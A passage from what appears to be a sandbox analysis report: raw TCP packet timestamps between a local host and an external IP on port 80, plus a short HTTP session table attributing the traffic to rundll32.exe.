| May 4, 2022 16:28:13.177033901 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177090883 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177113056 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177136898 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177141905 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177160978 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177172899 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177184105 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177198887 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177205086 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177225113 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177225113 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177244902 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177252054 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177267075 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177283049 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177294016 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177321911 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177839994 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177870035 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177897930 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177918911 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177927971 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177942038 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.177956104 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177983999 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.177983999 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.178009987 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.178014994 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.178030014 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.178040981 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.178059101 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.182807922 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182841063 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182867050 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182887077 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182914972 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.182934999 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.182938099 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182966948 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.182985067 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.182993889 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.183020115 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.183022022 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.183036089 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.183049917 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.183064938 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.183077097 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.183094978 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.183095932 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.183120966 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.184218884 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184259892 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184288025 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184314966 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184318066 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.184340954 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.184343100 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184370995 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184379101 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.184391975 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.184412003 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185165882 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185206890 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185234070 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185246944 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185255051 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185271025 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185292006 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185461998 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185492039 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185511112 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185520887 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185543060 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185549974 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185570002 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185579062 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185590982 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185607910 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185631990 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185633898 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185653925 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.185662985 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.185682058 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.186146975 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.186199903 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.314977884 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.337702036 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.619457006 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.619592905 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:28:13.619607925 CEST | 80 | 49758 | 185.189.151.28 | 192.168.2.5 |
| May 4, 2022 16:28:13.619687080 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
| May 4, 2022 16:29:12.354187012 CEST | 49758 | 80 | 192.168.2.5 | 185.189.151.28 |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49758 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
| Timestamp | kBytes transferred | Direction | Data |
|---|---|---|---|
| May 4, 2022 16:28:12.405919075 CEST | 500 | OUT | |
| May 4, 2022 16:28:12.702059031 CEST | 502 | IN |